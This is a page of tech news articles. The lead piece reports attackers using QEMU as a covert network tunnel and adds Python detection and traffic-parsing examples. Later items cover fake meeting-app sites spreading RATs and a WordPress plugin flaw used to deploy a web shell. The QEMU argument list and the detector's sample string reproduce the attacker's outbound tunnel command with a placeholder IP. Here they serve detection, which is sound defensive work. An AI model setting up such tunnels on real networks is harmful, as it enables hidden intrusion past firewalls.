Hackers Abuse QEMU Hardware Emulator to Covertly Exfiltrate Stolen Data


QEMU is an open-source hardware emulator and virtualizer. For attackers it provides a private, isolated virtual space in which to try out malicious code, exploits, and attacks in an environment they control.

This controlled testing ground minimizes the risk of detection and of legal consequences.

Moreover, QEMU lets attackers develop malware that can run across different hardware architectures and operating systems.

Cybersecurity researchers at Kaspersky Labs recently discovered that hackers are abusing the QEMU hardware emulator to exfiltrate stolen data covertly.

QEMU Hardware Emulator

Attackers favor legitimate tools both to avoid detection and to reduce the cost of developing their own malware.

Network scanning, data exfiltration, drive encryption, remote execution, and memory dumping are all activities that trusted software can be made to support.

Footholds in compromised systems come either from malware that is already installed or from RDP/VPN access that imitates a legitimate employee.

Network tunnels and port forwarding utilities then let the attacker bypass NAT and firewalls to reach the internal network.

Numerous tools exist for creating network tunnels between systems, some direct, others using proxies to mask attacker IPs.

These utilities frequently surfaced during researchers’ incident response efforts over the past three years.

The tools observed include:

  • Stowaway
  • ligolo
  • 3proxy
  • dog-tunnel
  • chisel
  • FRP
  • ngrok
  • gs-netcat
  • plink
  • iox
  • nps

Experts uncovered suspicious activity in a company’s system during a recent investigation. Among the tools detected were Angry IP Scanner, mimikatz, and QEMU. 

The presence of QEMU puzzled security analysts – why would attackers use a virtualizer? Further analysis revealed an unusual QEMU execution command line without a LiveCD or disk image.

The arguments were:

  • -m 1M: allocated only 1 MB of RAM, which is insufficient for most OSes.
  • -netdev user,id=lan,restrict=off: created a virtual network interface ‘lan’ that communicates externally without restrictions.
  • -netdev socket,id=sock,connect=<IP>:443: created a socket interface ‘sock’ connected to a remote server at <IP>:443.
  • -netdev hubport,id=port-lan/port-sock,hubid=0,netdev=lan/sock: added ports to a virtual hub, linked to the ‘lan’ and ‘sock’ interfaces.
  • -nographic: started QEMU in non-GUI console mode.

The external <IP> raised suspicions: QEMU’s -netdev options create network backends, and those backends can connect VMs to each other and to remote hosts.
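As an added example (not code from the Securelist report or from QEMU itself), the following Python turns the indicators listed above into a check that an endpoint sensor could apply to a QEMU command line: a tiny -m value, no bootable media, a socket backend that connects outward, user and socket backends joined by a hub, and a headless run. The function names, the internal address ranges, and the sample command lines (with a documentation-range placeholder IP) are assumptions made here.

```python
import ipaddress
import shlex

# Options that give a guest something to boot from; a QEMU run with none of
# these and a tiny -m value has no purpose except as a network relay.
BOOT_MEDIA_OPTS = {"-hda", "-hdb", "-cdrom", "-drive", "-kernel", "-blockdev"}
# Options that take no value, so the next argument does not belong to them.
FLAG_OPTS = {"-nographic", "-enable-kvm", "-daemonize", "-snapshot", "-no-reboot"}
# Ranges treated as internal (assumption); any other socket endpoint is external.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]


def parse_size_mib(value: str) -> float:
    """Convert a -m value ('1M', '2G', '512', 'size=1M,maxmem=..') to MiB."""
    value = value.split(",")[0]
    if value.startswith("size="):
        value = value[5:]
    units = {"K": 1 / 1024, "M": 1, "G": 1024, "T": 1024 * 1024}
    if value[-1].upper() in units:
        return float(value[:-1]) * units[value[-1].upper()]
    return float(value)  # QEMU treats a bare number as MiB


def parse_netdev(spec: str) -> dict:
    """'user,id=lan,restrict=off' -> {'type': 'user', 'id': 'lan', 'restrict': 'off'}."""
    kind, _, rest = spec.partition(",")
    opts = {"type": kind}
    for kv in filter(None, rest.split(",")):
        key, _, val = kv.partition("=")
        opts[key] = val
    return opts


def assess_qemu_cmdline(cmdline: str) -> list:
    """Return the tunnel indicators from the article that this command line shows."""
    argv = shlex.split(cmdline)
    opts, netdevs = {}, []
    for i, arg in enumerate(argv):
        if not arg.startswith("-"):
            continue  # argv[0] or a value already consumed by the option before it
        if arg in FLAG_OPTS or i + 1 == len(argv) or argv[i + 1].startswith("-"):
            opts[arg] = True
        elif arg == "-netdev":
            netdevs.append(parse_netdev(argv[i + 1]))
        else:
            opts[arg] = argv[i + 1]

    findings = []
    if isinstance(opts.get("-m"), str) and parse_size_mib(opts["-m"]) <= 16:
        findings.append(f"guest memory {opts['-m']} is too small to boot any OS")
    if not BOOT_MEDIA_OPTS & set(opts):
        findings.append("no disk image, CD-ROM or kernel given: nothing to boot")
    for nd in netdevs:
        if nd["type"] == "socket" and "connect" in nd:
            host = nd["connect"].rsplit(":", 1)[0]
            try:
                addr = ipaddress.ip_address(host)
                where = "internal" if any(addr in n for n in INTERNAL_NETS) else "external"
            except ValueError:
                where = "external"  # a hostname rather than a literal address
            findings.append(f"socket backend connects to {where} endpoint {nd['connect']}")
    if {"user", "socket", "hubport"} <= {nd["type"] for nd in netdevs}:
        findings.append("user and socket backends joined by a hub: tunnel topology")
    if "-nographic" in opts:
        findings.append("runs headless, with no console a user would see")
    return findings


# Constructed sample mirroring the article's command line; 203.0.113.10 is a
# documentation-range placeholder, not the address from the incident.
OBSERVED = ("qemu-system-x86_64 -m 1M -netdev user,id=lan,restrict=off "
            "-netdev socket,id=sock,connect=203.0.113.10:443 "
            "-netdev hubport,id=port-lan,hubid=0,netdev=lan "
            "-netdev hubport,id=port-sock,hubid=0,netdev=sock -nographic")
# An ordinary VM launch for comparison (also constructed).
BENIGN = ("qemu-system-x86_64 -enable-kvm -m 2G -hda disk.qcow2 "
          "-netdev user,id=n0 -device e1000,netdev=n0")

if __name__ == "__main__":
    for finding in assess_qemu_cmdline(OBSERVED):
        print("-", finding)
```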

Network tunnel (Source – Securelist)

Experts used QEMU to build a Kali Linux VM on AttackerServer. The VM was connected through a socket adapter and listened on port 443.

PivotHost had another QEMU instance that connected to the socket over AttackerServer’s port 443.

The user adapter was connected to the socket adapter through the hub, replicating the adversary’s QEMU options.

QEMU set up a PivotHost-AttackerServer tunnel to enable subnet scans from PivotHost to the Kali VM.

QEMU does not encrypt the tunneled traffic: each encapsulated packet is sent in the clear and consists of the Ethernet frame size followed by the frame itself.

Stripping these headers from intercepted traffic therefore recovers the original frames. Even so, threat actors keep finding ingenious uses for legitimate tools.
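As an added example (not code from the report or from QEMU), this Python strips the framing described above from a captured stream of the socket backend and decodes the recovered Ethernet frames, which is what a network sensor would do to inspect the tunneled subnet scan. It assumes the framing QEMU’s socket backend uses over a TCP connection, a 4-byte big-endian length before each frame; the function names and the sample traffic are constructed here, and the example also handles a record cut off at the end of the capture.

```python
import struct
from ipaddress import IPv4Address

ETHERTYPE_IPV4 = 0x0800


def split_qemu_socket_stream(stream: bytes):
    """Recover Ethernet frames from a captured QEMU '-netdev socket' TCP stream.

    Each record is a 4-byte big-endian frame length followed by the raw frame,
    with no encryption, so a sensor holding the stream can drop the length
    prefix and inspect the tunneled traffic directly. Returns the complete
    frames and whatever partial record remains at the end of the capture.
    """
    frames, offset = [], 0
    while offset + 4 <= len(stream):
        (length,) = struct.unpack_from(">I", stream, offset)
        if length < 14 or length > 65535:
            raise ValueError(f"implausible frame length {length} at offset {offset}")
        if offset + 4 + length > len(stream):
            break  # record cut off mid-frame: hand it back as leftover
        frames.append(stream[offset + 4:offset + 4 + length])
        offset += 4 + length
    return frames, stream[offset:]


def summarize_frame(frame: bytes) -> dict:
    """Decode the Ethernet header and, for IPv4, the addresses and protocol."""
    dst, src, ethertype = struct.unpack_from("!6s6sH", frame, 0)
    info = {"dst_mac": dst.hex(":"), "src_mac": src.hex(":"), "ethertype": ethertype}
    if ethertype == ETHERTYPE_IPV4 and len(frame) >= 34:
        fields = struct.unpack_from("!BBHHHBBH4s4s", frame, 14)
        info.update(src_ip=str(IPv4Address(fields[8])),
                    dst_ip=str(IPv4Address(fields[9])),
                    protocol=fields[6])
    return info


# ---- constructed sample traffic, not a real capture ----
def build_ipv4_frame(src_ip: str, dst_ip: str, protocol: int, payload: bytes) -> bytes:
    """Minimal Ethernet + IPv4 frame (checksum left zero; enough for inspection)."""
    eth = (bytes.fromhex("525400aabbcc") + bytes.fromhex("525400112233")
           + struct.pack("!H", ETHERTYPE_IPV4))
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), 0, 0, 64, protocol, 0,
                     IPv4Address(src_ip).packed, IPv4Address(dst_ip).packed)
    return eth + ip + payload


def encapsulate(frames) -> bytes:
    """Apply the same length-prefix framing the socket backend uses."""
    return b"".join(struct.pack(">I", len(f)) + f for f in frames)


SAMPLE_STREAM = encapsulate([
    build_ipv4_frame("10.0.0.5", "10.0.0.17", 6, b"\x00" * 20),        # TCP probe from the pivot
    build_ipv4_frame("10.0.0.5", "10.0.0.18", 1, b"\x08\x00\x00\x00"),  # ICMP echo request
]) + struct.pack(">I", 60) + b"\x00" * 10                               # a record still in flight

if __name__ == "__main__":
    frames, leftover = split_qemu_socket_stream(SAMPLE_STREAM)
    for frame in frames:
        print(summarize_frame(frame))
    print(f"{len(leftover)} bytes of an incomplete record left over")
```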

Multi-level protection that combines endpoint and network monitoring by SOC experts is crucial for detecting anomalies in time and blocking attacks; an MDR service can detect suspicious QEMU activity such as this.




‘Ultra’ flagship from Vivo to arrive later than expected


Vivo is planning to announce its ‘Ultra’ flagship this year, but it will arrive a bit later than expected. Well, that’s at least according to a new report that surfaced. The device in question is the Vivo X100 Ultra, and it’s said to launch in May.

An ‘Ultra’ flagship from Vivo is coming later than expected

Reports until now indicated that the phone will launch in April, in China. Now, one of China’s best-known tipsters, Digital Chat Station, says that the phone has been delayed to May. He did not share an exact launch date, however.

The Vivo X100 and Vivo X100 Pro arrived in mid-November. The ‘Pro’ model is already a true flagship, so the changes that Vivo can make with the ‘Ultra’ are quite limited. The company does plan to offer an upgraded camera setup, based on rumors, though.

The phone is expected to include the Snapdragon 8 Gen 3 processor, unlike its ‘Pro’ sibling. The Vivo X100 Pro comes with the MediaTek Dimensity 9300 chip. The device will likely offer plenty of RAM and storage, and Vivo will utilize LPDDR5X RAM and UFS 4.0 flash storage.

The device will include 100W charging, and an even better camera setup than the ‘Pro’ model

Samsung’s E7 AMOLED display is expected here, a QHD+ panel. That will likely be a 6.7 or a 6.8-inch display, and chances are it will be curved. A 5,000mAh battery was also mentioned in rumors, and the same goes for 100W wired and 50W wireless charging. The phone will include a charger too, by the way.

Now, in regards to the cameras. A quad camera setup is expected with four 50-megapixel units. For comparison’s sake, the Vivo X100 Pro includes three 50-megapixel cameras on the back.

The main camera on the phone is said to be the Sony LYT-900 unit. That is the same camera the OPPO Find X7 Ultra is using for its main shooter. We’re also expecting to see two periscope telephoto cameras and an ultrawide unit on the back.



Microsoft discontinues support for running Android apps on Windows 11


Although it’s been talking about Windows Subsystem for Android for years, Microsoft has decided to shelve the feature that allows Windows 11 users to run Android apps on their PCs.

Instead of adding support for more platforms, Microsoft’s Windows Subsystem for Android was limited to apps that are available in the Amazon Appstore. Early this week, Microsoft confirmed that the Windows Subsystem for Android feature that it promised to improve will be actually discontinued.

According to Microsoft, starting March 5, 2025, the Amazon Appstore on Windows and all applications and games dependent on Windows Subsystem for Android will no longer be supported.

However, the Redmond-based company revealed that those who have installed the Amazon Appstore or Android apps prior to March 5, 2024, will continue to have access to those apps through the deprecation date of March 5, 2025.

It’s unclear why Microsoft decided to discontinue support for running Android apps on Windows 11, but Phone Link has been the better option for those who wanted to do this for many years.

Time will tell if Microsoft will instead focus on making Phone Link even better than it is now that the alternative, Windows Subsystem for Android, is no more.



Hackers use Zoom & Google Meet Lures to Attack Android & Windows


A threat actor has been identified creating fraudulent Skype, Google Meet, and Zoom websites to distribute malware, specifically targeting Android and Windows users.

This article delves into the details of this malicious campaign and explains how users can identify and protect themselves from these threats.

Attack Sequence:

A threat actor distributes various malware families through fake Skype, Zoom, and Google Meet websites.

Remote Access Trojans (RATs) such as SpyNote RAT for Android, and NjRAT and DCRat for Windows, are being distributed.


The attacker utilized shared web hosting with all fake sites hosted on a single IP address in Russia.

Malicious URLs closely resemble legitimate websites, making it challenging for users to differentiate.

Attack chain and execution flow for Android and Windows campaigns (source: Zscaler)

The attacker’s modus operandi involves luring users to click on fake sites where clicking on the Android button initiates the download of a malicious APK file, while clicking on the Windows button triggers the download of a BAT file, leading to a RAT payload download.

Rest assured that Zscaler’s ThreatLabz team diligently monitors and shares expert insights on all potential threats to keep you and the wider community safe.

Skype:

The first fake site discovered was join-skype[.]info, designed to deceive users into downloading a fake Skype application.

The Windows button pointed to Skype8.exe and the Google Play button to Skype.apk.

The fraudulent Skype website, with a fake domain meant to resemble the legitimate Skype domain. (Source urlscan.io.)

Google Meet:

Another fake site, online-cloudmeeting[.]pro, mimicking Google Meet, was identified. The site provided links to download fake Skype applications for Android and Windows.

The Windows link led to a BAT file downloading DCRat, while the Android link led to a SpyNote RAT APK file.

The fake Google Meet page, showing the fraudulent domain in the address bar; the fake Google Meet Windows application link leads to a malicious BAT file that downloads and executes malware. (Source: Zscaler)

Zoom:

Later, a fake Zoom site, us06webzoomus[.]pro, emerged with links to download SpyNote RAT for Android and DCRat for Windows.

The site’s URL closely resembled a legitimate Zoom meeting ID.

The fake Zoom page, showing a domain similar to the real Zoom domain in the address bar and a link to the malicious APK file that contains SpyNote RAT when the Google Play button is clicked. (source: Zscaler)

Open Directories:

The fake Google Meet and Zoom sites also contained additional malicious files like driver.exe and meet.exe (NjRAT), indicating potential future campaigns utilizing these files.

Example of additional malicious files hosted on the websites hosting fake online meeting applications. (Source: Zscaler)

Businesses are at risk of impersonation attacks through online meeting applications, leading to the distribution of RATs that can compromise sensitive data.

Vigilance, robust security measures, regular updates, and patches are crucial in safeguarding against evolving cyber threats. Proactive measures are essential as cyber threats evolve.

Zscaler’s ThreatLabz team remains dedicated to monitoring these threats and sharing insights with the community.




It’ll be easier to know what Android Auto apps you can’t use while driving


Android Auto comes with a ton of apps you can use to help boost your smart car experience. However, some of the apps can be rather distracting, which is a car accident just waiting to happen. Luckily, the most distracting Android Auto apps can only be used when your car is parked. Thanks to a new update, it’ll be easier to know which apps these are.

A good example of a distracting app is called GameSnacks. This is a suite of games that you can play on your car’s dashboard. Obviously, you would not want to play these games while driving. That could lead to large casualties due to car accidents and large lawsuits against Google and the app developer. So, if you try to fire up GameSnacks while you are on the road, you will not be able to use it. This is a great safety feature, and it’s going to get better thanks to an update.

Android Auto will make it easier to know which apps you can only use while parked

When trying to figure out which apps you can only use while parked, most people have to find out the hard way. They have to start the app and get the notification. However, Google has come up with a simple way to let people know that you can’t use certain apps while driving.

On the app icon, you’ll see a little “P” symbol. This little “P” symbol symbolizes that you can’t use the app while driving. So, rather than starting the app, you simply have to look at the icon.

When it comes to navigating, there’s another Google feature that will help you out. Google Maps will show you building entrances. When you are on the map view, and you tap on the building, you will see arrows pointing to where the building’s entrance and exits are. This will help you navigate to buildings you are unfamiliar with and choose the right entrances. This feature is currently rolling out.



Google TV adds free and free-with-ads Oscar-nominated films to get you ready for the Academy Awards


The Oscars are just around the corner, and if you like to be up to date on the movies that are nominated for an Academy Award this year—so you can either agree or disagree with who takes away the prize in the end—then Google TV can be your guide. Google TV has updated their recommendations section to include an Oscar-nominated movies category that serves up new and old Oscar-nominated films that you can watch for free, free with ads, or with a subscription.

Spotted by Android Authority, the category refresh includes all the Best Picture nominees from this year, making it easy for you to catch up on the contenders before the big night. In the mix, you can find Best Picture nominees like “Oppenheimer” and “Barbie,” as well as curated selections of films perfect for reliving the classics or celebrating Women’s History Month. These are the titles available through Google TV:

For free or with a subscription:
  • Oppenheimer
  • Killers of the Flower Moon
  • Barbie
  • Anatomy of a Fall
  • The Holdovers
  • Past Lives
  • The Zone of Interest
  • The Color Purple
  • The Creator
  • Napoleon
  • Golda
  • Guardians of the Galaxy Vol. 3
  • Mission: Impossible – Dead Reckoning
  • Elemental
  • Spider-Man: Across the Spider-Verse
  • Flamin’ Hot

Free, but with ads:
  • Knives Out
  • Monster’s Ball
  • Forrest Gump
  • The Hurt Locker
  • The Big Short
  • Boyhood
  • Hotel Rwanda
  • Sophie’s Choice
  • Mississippi Burning
  • Rain Man
  • Who’s Afraid of Virginia Woolf?
  • In the Heat of the Night
  • The Apartment
  • Babel
  • Dead Man Walking
  • Adaptation
  • Capote
  • Cold Mountain
  • The Maltese Falcon
  • The Reader
  • Requiem for a Dream
  • I’m Not There
  • A Streetcar Named Desire
  • Manhattan
  • Margin Call
  • Strangers on a Train
  • Barry Lyndon
  • The Third Man
  • Dances with Wolves
  • Pan’s Labyrinth
  • Stand and Deliver
  • Bullitt
  • North by Northwest
  • Amores perros
  • Doctor Zhivago

The Academy Awards (a.k.a. “The Oscars”) will be held this Sunday March 10th at 7pm Pacific Time and will be broadcast live on ABC, with a 30-minute pre-show that will lead into the award show. If you are a YouTube TV subscriber, you will be able to stream via the app, or if you have a cable subscription and prefer to stream, you can always do so using the ABC app as well.


Hackers Exploit WordPress Plugin Flaw to Deploy Godzilla


Hackers have been found exploiting a vulnerability in the 3DPrint Lite WordPress plugin (CVE-2021-4436) to deploy the notorious Godzilla web shell.

This malicious activity significantly threatens website security and data integrity, prompting concerns among cybersecurity experts and website administrators worldwide.

Cybercriminals commonly exploit vulnerabilities in popular software, such as WordPress plugins, to gain unauthorized access to websites.

In this instance, the hackers have leveraged a flaw in a specific WordPress plugin to deploy the Godzilla Web Shell. This powerful tool allows them to execute arbitrary commands on compromised websites.

Implications for Website Security

The deployment of the Godzilla Web Shell signifies a grave security risk for websites running the vulnerable WordPress plugin.

Once installed, this web shell grants hackers remote access and control over the website, enabling them to steal sensitive data, deface web pages, or launch further cyber attacks.


Website owners are urged to take immediate action to secure their sites and mitigate the potential damage caused by this exploit.

According to Threat Brief, the vulnerability found in the WordPress plugin has been exploited to deploy the Godzilla web shell, and a new CVE has been assigned as a result.

Cybersecurity experts are actively monitoring the situation and working on developing countermeasures to address this emerging threat.

By analyzing detailed Threat Briefs like those produced regularly by security firms, including reports on ransomware variants like BlackSuit, BlackCat, and AlphV, industry professionals are enhancing their detection rulesets to identify and thwart such malicious activities proactively.

Strengthening Website Defenses

Website administrators are advised to stay informed about the latest security vulnerabilities and apply patches promptly to safeguard against similar cyber threats.

Regularly updating software, implementing robust access controls, and conducting security audits can help fortify defenses against potential exploits like the one targeting the WordPress plugin.

Exploiting a WordPress plugin flaw to deploy the Godzilla Web Shell underscores the critical need for proactive cybersecurity measures.

By staying vigilant, updating defenses, and leveraging insights from threat intelligence reports, website owners can better protect their online assets from malicious actors seeking to compromise their security.




Tidal’s lossless plan now costs the same as a Spotify subscription


Amidst companies continually increasing subscription fees and reducing quality, Tidal has just decreased the cost of its lossless plan. The news comes via a post from the company itself on “upcoming changes” to its subscription plans. What’s truly a shocker is that the changes are making the subscriptions cheaper. Tidal has been a go-to for many audiophiles for its offering of lossless streaming. The new pricing makes Tidal a much more formidable competitor to Spotify.

What do Tidal’s new lossless plans cost?

Previously, Tidal’s HiFi subscription cost users $20 a month. This is almost double Spotify’s $10.99 fee. Tidal’s new fee is exactly the same as Spotify; $10.99. The company is merging all HiFi tiers into one, called the Tidal tier. Both services cost the same now, and the deciding factors now come down to the features offered by either.

Spotify has a lot going for it – like its amazing discovery feature and a bigger music library – but Tidal offers better sound. Audiophiles with expensive gear will almost always choose Tidal for its FLAC offerings. More casual listeners might not be swayed as much and may prefer Spotify’s excellent playlists. The music library is also vaster on Spotify which may be another reason to stick with it for now. Spotify has no lossless streaming options, despite the company promising it for years.

What is lossless audio?

Most music available for streaming or download is compressed, with bitrates ranging from 192 kbps, for small file sizes, to 320 kbps as a compromise between quality and size. Lossless audio, on the other hand, is a little over 1400 kbps. This is as good as audio can get in a digital format. It is completely uncompressed, raw audio. This is most often presented in the FLAC format.

Something worth keeping in mind is that not all gear can make use of lossless audio. Nor can many people hear the difference between 320 kbps and lossless music. However, if someone is passionate about audio and has good audio gear, Tidal’s lossless offering is definitely the way to go. Especially with the new price, Spotify now has tough competition and really needs to up its game.

When comparing music streaming services, people only choose between Tidal and Apple Music if lossless is a priority. Spotify’s slow adoption of lossless streaming is only hurting the company’s bottom line. Tidal says the new pricing will take effect from April 10. The individual plan is $10.99, and the family plan is now $16.99.



ChatGPT can talk to you now


So, you have ChatGPT generate a response for you, but it’s just too long to read. Well, as detailed and meticulous as ChatGPT can be with its answers, this is bound to happen from time to time. Fear not, as ChatGPT can now read its answers aloud to you.

OpenAI posted a video to its official X account, to announce this news. It’s first launching this feature to the iOS and Android versions of the app. It announced that it’s going to be rolling this out to the web version as well.

ChatGPT is getting a read-aloud feature

We see this in version 1.2024.052 of the Android app. In order to activate the Read Aloud feature, go to a conversation and hold your finger down on one of ChatGPT’s answers. You will see a little drop-down menu open up. The bottom option will be Read aloud.

When you tap on the option, you will see a little control panel appear at the top of the screen. This will show you the duration of the read-aloud session along with how much time has elapsed. Along with that, you’ll see four controls. The first control, which looks like a stop button with an arrow and circling it, will enable/disable the auto-read-back function. When enabled, the app will automatically read back your responses every time you ask ChatGPT something. It will only do this if the panel is still visible.

The next two buttons will jump forward 10 seconds and jump backward 10 seconds. Also, the last button will close the panel.

Using this feature on the web will be a little bit different. Rather than tapping and holding on a message, you will just roll your mouse over the message and click on the Read aloud button that appears under it. However, this feature is not currently available for the web version, so it’s coming soon.

If you don’t see this feature for your app, make sure that it is fully updated. Depending on your region, there’s a chance that you’ll need to wait a bit.



Besides Facebook and Instagram, the Google Play Store also went down today

Complaints about the Play Store being down came in from Android users in U.S. cities like Seattle to Android owners unable to search for any new apps in Southwest Brazil. One DownDetector subscriber wrote, “Play Store not searching for apps. Just keeps spinning and spinning. I guess it is playing with the spinning thing instead of doing its job at being a store.”

According to the Google Play Status Dashboard, an issue with the Play Integrity API started creating the issue at around 10:37 am ET and it ended at 11:40 am ET. The Play Integrity API helps app developers check to make sure that user actions and requests are coming from a legit Android user who has purchased or installed a developer’s app or game. It can also detect whether the Android user is using a tampered version of the developer’s app.

By the way, you might find it interesting to install the DownDetector app on your iPhone or Android handset. Personally, when there have been times when I couldn’t reach my kids on the phone, I open the app to see whether my carrier is down. If there is no issue, well then, I know it’s time to worry.

You can install the app on your iPhone by tapping on this link which will take you to the App Store. If you have an Android device, and the Google Play Store is up and running, you can click on this link to install the Android version of the DownDetector app.

It seems that we’ve all survived a day with Facebook, Instagram, and the Play Store all going down in the morning. What will happen next?

